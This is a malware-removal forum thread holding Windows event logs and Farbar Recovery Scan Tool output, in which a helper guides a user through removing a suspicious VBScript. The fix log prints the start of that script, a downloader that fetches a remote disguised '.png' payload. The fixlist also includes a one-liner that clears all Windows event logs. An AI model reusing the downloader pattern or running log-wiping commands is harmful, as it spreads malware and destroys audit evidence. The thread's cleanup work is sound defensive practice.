    Error: (02/01/2017 05:12:02 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: JOSEPHW)
    Description: Activation of app Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.
     
    Error: (02/01/2017 05:11:37 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: JOSEPHW)
    Description: Package Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy+CortanaUI was terminated because it took too long to suspend.
     
    Error: (02/01/2017 05:09:22 PM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: IntelCpHDCPSvc.exe, version: 1.0.0.1, time stamp: 0x572a4b65
    Faulting module name: ntdll.dll, version: 10.0.14393.479, time stamp: 0x5825887f
    Exception code: 0xc0000005
    Fault offset: 0x000000000002f7db
    Faulting process id: 0xbbc
    Faulting application start time: 0x01d27cd7d151d8ae
    Faulting application path: C:\WINDOWS\system32\IntelCpHDCPSvc.exe
    Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
    Report Id: 3e6b982e-6b09-46dd-85b0-d82eba4dc172
    Faulting package full name: 
    Faulting package-relative application ID:
     
    Error: (02/01/2017 04:59:36 PM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: ShellExperienceHost.exe, version: 10.0.14393.447, time stamp: 0x5819bf85
    Faulting module name: twinapi.appcore.dll, version: 10.0.14393.206, time stamp: 0x57daca78
    Exception code: 0xc000027b
    Fault offset: 0x000000000006d1c4
    Faulting process id: 0x548
    Faulting application start time: 0x01d27cd53b391a9d
    Faulting application path: C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
    Faulting module path: C:\Windows\System32\twinapi.appcore.dll
    Report Id: 2e0a5a99-e912-4c25-a6aa-1c39d78550b5
    Faulting package full name: Microsoft.Windows.ShellExperienceHost_10.0.14393.693_neutral_neutral_cw5n1h2txyewy
    Faulting package-relative application ID: App
     
    Error: (02/01/2017 09:42:15 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: JOSEPHW)
    Description: Activation of app Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy!App failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
     
    Error: (02/01/2017 09:40:01 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: JOSEPHW)
    Description: Package Microsoft.Windows.ShellExperienceHost_10.0.14393.693_neutral_neutral_cw5n1h2txyewy+App was terminated because it took too long to suspend.
     
    Error: (02/01/2017 09:32:01 AM) (Source: DPTF) (EventID: 256) (User: )
    Description: Intel® Dynamic Platform and Thermal Framework : ESIF(8.1.10608.329) TYPE: ERROR
     
    DPTF Build Version:  8.1.10608.329
    DPTF Build Date:  May 13 2016 11:00:20
    Source File:  ..\..\..\..\Sources\Policies\PolicyLib\PolicyBase.cpp @ line 673
    Executing Function:  PolicyBase::takeControlOfOsc
    Message:  Failed to acquire OSC: Failure during execution of _OSC: 
    DPTF Build Version:  8.1.10608.329
    DPTF Build Date:  May 13 2016 11:00:20
    Source File:  ..\..\..\Sources\Manager\EsifServices.cpp @ line 473
    Executing Function:  EsifServices::primitiveExecuteSet
    Message:  Error returned from ESIF services interface function call
    Participant:  NoParticipant
    Domain:  NoDomain
    ESIF Primitive:  SET_OPERATING_SYSTEM_CAPABILITIES [93]
    ESIF Instance:  255
    ESIF Return Code:  ESIF_E_UNSUPPORTED_ACTION_TYPE [1202]
     
     
    Policy:  Passive Policy 2 [2]
     
     
    System errors:
    =============
    Error: (02/01/2017 05:45:07 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.
     
    Error: (02/01/2017 05:45:03 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.
     
    Error: (02/01/2017 05:44:59 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.
     
    Error: (02/01/2017 05:44:55 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.
     
    Error: (02/01/2017 05:44:51 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.
     
    Error: (02/01/2017 05:44:47 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.
     
    Error: (02/01/2017 05:44:43 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.
     
    Error: (02/01/2017 05:44:39 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.
     
    Error: (02/01/2017 05:44:32 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.
     
    Error: (02/01/2017 05:44:28 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.
     
     
    CodeIntegrity:
    ===================================
      Date: 2017-02-01 17:09:17.933
      Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bitdefender\Bitdefender 2017\dbghelp.dll that did not meet the Custom 3 / Antimalware signing level requirements.
     
      Date: 2017-02-01 17:09:17.914
      Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
     
      Date: 2017-02-01 09:37:27.153
      Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bitdefender\Bitdefender 2017\dbghelp.dll that did not meet the Custom 3 / Antimalware signing level requirements.
     
      Date: 2017-02-01 09:34:59.953
      Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
     
      Date: 2017-02-01 08:45:29.642
      Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bitdefender\Bitdefender 2017\dbghelp.dll that did not meet the Custom 3 / Antimalware signing level requirements.
     
      Date: 2017-01-25 00:38:08.666
      Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
     
     
    ==================== Memory info =========================== 
     
    Processor: Intel® Core™ i7-6500U CPU @ 2.50GHz
    Percentage of memory in use: 21%
    Total physical RAM: 16273.91 MB
    Available physical RAM: 12742.12 MB
    Total Virtual: 18705.91 MB
    Available Virtual: 15116.4 MB
     
    ==================== Drives ================================
     
    Drive c: (Windows) (Fixed) (Total:913.93 GB) (Free:825.91 GB) NTFS
    Drive d: (RECOVERY) (Fixed) (Total:16.35 GB) (Free:1.88 GB) NTFS ==>[system with boot components (obtained from drive)]
    Drive e: (Disc1) (CDROM) (Total:1 GB) (Free:0 GB) UDF
     
    ==================== MBR & Partition Table ==================
     
    ========================================================
    Disk: 0 (Size: 931.5 GB) (Disk ID: D379171D)
     
    Partition: GPT.
     
    ==================== End of Addition.txt ============================
     
    Please let me know if you need any other info.
    Thank you!
     
     
     
     


    #4
    RKinner


    You have a file:

     

    C:\Users\Joseph\AppData\Roaming\6ov.vbs

     

    I don't know what it does but it looks like it might be malware. A Google search doesn't turn up much but there is one site that indicates it's malware.

     

    https://www.hybrid-a...vironmentId=100

     

     It got on your PC on 1/20 

     

    Let's look at it and remove it with FRST.

     

     

     
    Download the attached fixlist.txt to the same location as FRST
     
     
    Run FRST and press Fix (this will cause a reboot)
    A fix log will be generated; please post that.
     
     
    Run FRST again as before.  Make sure Addition.txt is checked and hit Scan.  Post both logs.
     
     
     


    #5
    mw201


    Here is the first fix log:

     

     

    Fix result of Farbar Recovery Scan Tool (x64) Version: 29-01-2017
    Ran by Joseph (01-02-2017 21:13:44) Run:1
    Running from C:\Users\Joseph\Downloads
    Loaded Profiles: Joseph (Available Profiles: Joseph)
    Boot Mode: Normal
    ==============================================

    fixlist content:
    *****************
    CloseProcesses:
    ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
    BHO: No Name -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> No File
    R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
    CMD: type C:\Users\Joseph\AppData\Roaming\6ov.vbs
    C:\Users\Joseph\AppData\Roaming\6ov.vbs
    CustomCLSID: HKU\S-1-5-21-2731509489-3924948741-1415746157-1001_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-CF295C30B57B}\InprocServer32 -> %%systemroot%%\system32\shell32.dll => No File
    CMD: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
    *****************

    Processes closed successfully.
    HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast => key removed successfully
    HKCR\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => key not found.
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B4F3A835-0E21-4959-BA22-42B3008E02FF} => key removed successfully
    HKCR\CLSID\{B4F3A835-0E21-4959-BA22-42B3008E02FF} => key not found.
    ibtsiva => Service stopped successfully.
    HKLM\System\CurrentControlSet\Services\ibtsiva => key removed successfully
    ibtsiva => service removed successfully

    ========= type C:\Users\Joseph\AppData\Roaming\6ov.vbs =========

    Dim drgfgd, jhgfsf  
    Set drgfgd = CreateObject("Microsoft.XMLHTTP")
    Set jhgfsf = CreateObject("Adodb.Stream")
    drgfgd.Open "GET", "http://disk.karelia....etBdl/996.png",False

    ========= End of CMD: =========

    C:\Users\Joseph\AppData\Roaming\6ov.vbs => moved successfully
    HKU\S-1-5-21-2731509489-3924948741-1415746157-1001_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-CF295C30B57B} => key removed successfully

    ========= for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" =========

    Failed to clear log AirSpaceChannel. The requested operation cannot be performed over an enabled direct channel. The channel must first be disabled before performing the requested operation.
    Failed to clear log Intel-SST-CFD-HDA/IntelSST. The instance name passed was not recognized as valid by a WMI data provider.
    Failed to clear log Microsoft-Windows-LiveId/Analytic. Access is denied.
    Failed to clear log Microsoft-Windows-LiveId/Operational. Access is denied.
    Failed to clear log Microsoft-Windows-USBVideo/Analytic. The instance name passed was not recognized as valid by a WMI data provider.

    ========= End of CMD: =========



    The system needed a reboot.

    ==== End of Fixlog 21:16:45 ====



    #6
    mw201


    Here is the FRST

     

    Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 29-01-2017
    Ran by Joseph (administrator) on JOSEPHW (01-02-2017 21:30:42)
    Running from C:\Users\Joseph\Downloads
    Loaded Profiles: Joseph (Available Profiles: Joseph)
    Platform: Windows 10 Home Version 1607 (X64) Language: English (United States)
    Internet Explorer Version 11 (Default browser: Chrome)
    Boot Mode: Normal
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

    ==================== Processes (Whitelisted) =================

    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

    (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe
    (Bitdefender) C:\Program Files\Bitdefender\Bitdefender Device Management\DevMgmtService.exe
    (Intel Corporation) C:\Windows\System32\igfxCUIService.exe
    (Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
    (Microsoft Corporation) C:\Windows\System32\wlanext.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
    (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
    (Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
    (Bitdefender) C:\Program Files\Bitdefender Agent\ProductAgentService.exe
    (Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
    (Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
    (Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
    (Intel Corporation) C:\Windows\SysWOW64\esif_uf.exe
    (Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
    () C:\Program Files\CyberLink\Shared files\RichVideo64.exe
    (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
    (HP Inc.) C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe
    (Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
    (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe
    (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
    (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe
    (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
    (Intel Corporation) C:\Windows\Temp\DPTF\esif_assist_64.exe
    (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
    Failed to access process -> IntelCpHDCPSvc.exe
    (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
    (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
    (Intel Corporation) C:\Windows\System32\igfxEM.exe
    (Intel Corporation) C:\Windows\System32\igfxHK.exe
    (Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
    (HP Development Company, L.P.) C:\Program Files (x86)\HP\HP CoolSense\CoolSense.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
    (Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe
    (Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
    (Hewlett-Packard Co.) C:\Program Files\HP\HP Photosmart 6520 series\Bin\ScanToPCActivationApp.exe
    (Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE
    (Hewlett-Packard Co.) C:\Program Files\HP\HP Photosmart 6520 series\Bin\HPNetworkCommunicator.exe
    (WildTangent) C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe
    (HP Inc.) C:\Program Files\HPCommRecovery\HPCommRecovery.exe
    (Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
    (HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
    (Microsoft Corporation) C:\Windows\System32\smartscreen.exe
    (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
    (Microsoft Corporation) C:\Windows\System32\dllhost.exe
    (Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
    (Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    (Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
    (Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.693_none_42ff55c9655f38bf\TiWorker.exe

    ==================== Registry (Whitelisted) ====================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9181696 2017-01-13] (Realtek Semiconductor)
    HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)
    HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [2780112 2017-01-20] (Malwarebytes)
    HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [27262432 2016-12-20] (Skype Technologies S.A.)
    HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\...\Run: [HP Photosmart 6520 series (NET)] => C:\Program Files\HP\HP Photosmart 6520 series\Bin\ScanToPCActivationApp.exe [2573416 2012-10-17] (Hewlett-Packard Co.)
    HKU\S-1-5-18\...\RunOnce: [Application Restart #0] => C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe [371928 2016-07-16] (Microsoft Corporation)
    ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
    ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
    ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
    Startup: C:\Users\Joseph\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk [2016-10-31]
    ShortcutTarget: Send to OneNote.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE (Microsoft Corporation)

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

    Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
    Tcpip\..\Interfaces\{f314d896-c550-4d14-b773-fdf73ec6770f}: [DhcpNameServer] 192.168.1.1

    Internet Explorer:
    ==================
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://hp15-comm.msn.com/?pc=HRTE
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp15-comm.msn.com/?pc=HRTE
    HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://hp15-comm.msn.com/?pc=HRTE
    HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp15-comm.msn.com/?pc=HRTE
    BHO: Bitdefender Wallet  -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-01-13] (Bitdefender)
    BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2016-12-28] (Microsoft Corporation)
    BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2016-12-28] (Microsoft Corporation)
    BHO-x32: Bitdefender Wallet -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-01-13] (Bitdefender)
    BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2016-07-21] (HP Inc.)
    Toolbar: HKLM - Bitdefender Wallet  - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-01-13] (Bitdefender)
    Toolbar: HKLM-x32 - Bitdefender Wallet - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-01-13] (Bitdefender)
    Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-12-28] (Microsoft Corporation)
    Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-12-28] (Microsoft Corporation)
    Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-12-28] (Microsoft Corporation)
    Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-12-28] (Microsoft Corporation)
    Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
    Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)

    FireFox:
    ========
    FF DefaultProfile: y2l2kxa2.default
    FF ProfilePath: C:\Users\Joseph\AppData\Roaming\Mozilla\Firefox\Profiles\y2l2kxa2.default [2017-02-01]
    FF Extension: (Adblock Plus) - C:\Users\Joseph\AppData\Roaming\Mozilla\Firefox\Profiles\y2l2kxa2.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2017-02-01]
    FF Extension: (Diagnostics) - C:\Users\Joseph\AppData\Roaming\Mozilla\Firefox\Profiles\y2l2kxa2.default\features\{ed517155-4b2e-41a9-a11a-b6c004d1e42b}\[email protected] [2017-02-01]
    FF Extension: (Send HSTS Priming Requests) - C:\Users\Joseph\AppData\Roaming\Mozilla\Firefox\Profiles\y2l2kxa2.default\features\{ed517155-4b2e-41a9-a11a-b6c004d1e42b}\[email protected] [2017-02-01]
    FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
    FF Extension: (Bitdefender Wallet) - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff [2017-01-19]
    FF HKLM\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
    FF Extension: (Bitdefender Antispam Toolbar) - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext [2017-01-19] [not signed]
    FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
    FF HKLM-x32\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
    FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-12-09] (Adobe Systems)
    FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\WINDOWS\SysWOW64\Adobe\Director\np32dsw_1225195.dll [2016-09-20] (Adobe Systems, Inc.)
    FF Plugin-x32: @Citrix.com/npican -> C:\Program Files (x86)\Citrix\ICA Client\npicaN.dll [2016-09-05] (Citrix Systems, Inc.)
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-08-24] (Intel Corporation)
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-08-24] (Intel Corporation)
    FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2016-12-28] (Microsoft Corporation)
    FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
    FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
    FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2015-12-22] ()
    FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-12-09] (Adobe Systems)

    Chrome:
    =======
    CHR Plugin: (Widevine Content Decryption Module) - C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\WidevineCdm\_platform_specific\win_x64\widevinecdmadapter.dll (Google Inc.)
    CHR Plugin: (Shockwave Flash) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\PepperFlash\24.0.0.194\pepflashplayer.dll ()
    CHR Profile: C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default [2017-02-01]
    CHR Extension: (Google Docs) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-09-24]
